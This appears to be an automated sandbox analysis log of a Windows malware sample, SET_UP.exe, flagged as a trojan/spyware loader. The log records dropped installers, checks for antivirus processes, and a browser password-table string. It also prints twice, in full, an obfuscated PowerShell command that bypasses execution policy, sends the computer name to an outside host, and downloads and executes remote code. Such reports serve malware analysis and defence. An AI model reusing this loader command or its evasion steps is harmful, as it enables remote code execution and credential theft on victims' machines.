            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0047D940 0_2_0047D940
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0042190D 0_2_0042190D
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00449BA0 0_2_00449BA0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A5C25 0_2_004A5C25
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A5D16 0_2_004A5D16
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A5E20 0_2_004A5E20
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00481EE0 0_2_00481EE0
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_00449E8E 0_2_00449E8E
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004A5EA0 0_2_004A5EA0
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\is-DQ6NK.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 00496E75 appears 49 times
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 00496DC0 appears 339 times
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 004AF857 appears 54 times
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 00425C79 appears 34 times
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 004C4D62 appears 38 times
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 004749F0 appears 111 times
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: String function: 004BC31A appears 39 times
            Source: SET_UP.exe | Static PE information: invalid certificate
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe.0.dr | Static PE information: Number of sections : 11 > 10
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.8.dr | Static PE information: Number of sections : 11 > 10
            Source: LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp.6.dr | Static PE information: Number of sections : 11 > 10
            Source: SET_UP.exe, 00000000.00000003.1969800222.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966243946.0000000003C80000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967615439.0000000003BC3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966990463.0000000003ABD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1972519369.0000000003D0B000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967400282.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967721763.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967833052.0000000003BC0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1973060526.0000000003BE5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968154432.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970689425.0000000003BC7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968914828.0000000003BBF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1969593206.0000000003ABF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970117688.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971285796.0000000003BDE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1969370980.0000000003BB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967942757.0000000003AC3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966625247.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968373832.0000000003AC0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968481399.0000000003BBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameMP4Player.EXE vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970232666.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1975540190.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1974546596.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1969480169.0000000003CC7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971164527.0000000003AB6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968564993.0000000003ABC000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970810055.0000000003CDF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970457041.0000000003CE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970031083.0000000003AB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971528559.0000000003BE2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971794934.0000000003AB5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968772939.0000000003AB4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968662914.0000000003BB4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970927214.0000000003AC2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966480404.0000000003BAE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967504482.0000000003AC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967202416.0000000003CA3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1832528276.0000000002EE5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMP4Player.EXE vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1965927695.0000000003ABD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1973519910.0000000003AB7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966880719.0000000003C91000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970344765.0000000003BCB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1965800504.0000000003C73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968263654.0000000003BBD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966073674.0000000003B97000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1966766218.0000000003B96000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1972083777.0000000003BDD000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1971407700.0000000003ABE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1967094793.0000000003BB1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1978455915.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1968048902.0000000003BC3000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe, 00000000.00000003.1970573517.0000000003AB6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameColorStreamLib.exe vs SET_UP.exe
            Source: SET_UP.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 00000000.00000002.2022408392.00000000028B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@59/13@3/3
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_0041D56A GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 0_2_0041D56A
            Source: C:\Users\user\Desktop\SET_UP.exe | Code function: 0_2_004B4D21 FindResourceW,LoadResource,LockResource, 0_2_004B4D21
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | File created: C:\Users\user\AppData\Roaming\ColorStreamLib
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5416:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7276:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1908:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7808:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:888:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
            Source: C:\Users\user\Desktop\SET_UP.exe | File created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe
            Source: SET_UP.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
            Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
            Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
            Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
            Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
            Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\SET_UP.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
            Source: SET_UP.exe, 00000000.00000003.1873439977.0000000003711000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SET_UP.exe | Virustotal: Detection: 8%
            Source: SET_UP.exe | ReversingLabs: Detection: 18%
            Source: C:\Users\user\Desktop\SET_UP.exe | File read: C:\Users\user\Desktop\SET_UP.exe
            Source: unknown | Process created: C:\Users\user\Desktop\SET_UP.exe "C:\Users\user\Desktop\SET_UP.exe"
            Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Process created: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Process created: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\timeout.exe "timeout" 9
            Source: C:\Windows\System32\timeout.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
            Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Q{
            Source: C:\Users\user\Desktop\SET_UP.exe | Process created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Process created: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$F0298,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe"
            Source: C:\Users\user\AppData\Local\Temp\is-L4TNG.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp | Process created: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe "C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
            Source: C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe | Process created: C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp "C:\Users\user\AppData\Local\Temp\is-TCHJJ.tmp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.tmp" /SL5="$30470,7785838,845824,C:\Users\user\AppData\Local\Temp\LWU9W6M6UEEDFY7CFL4Y0PU0M3AUYM.exe" /VERYSILENT
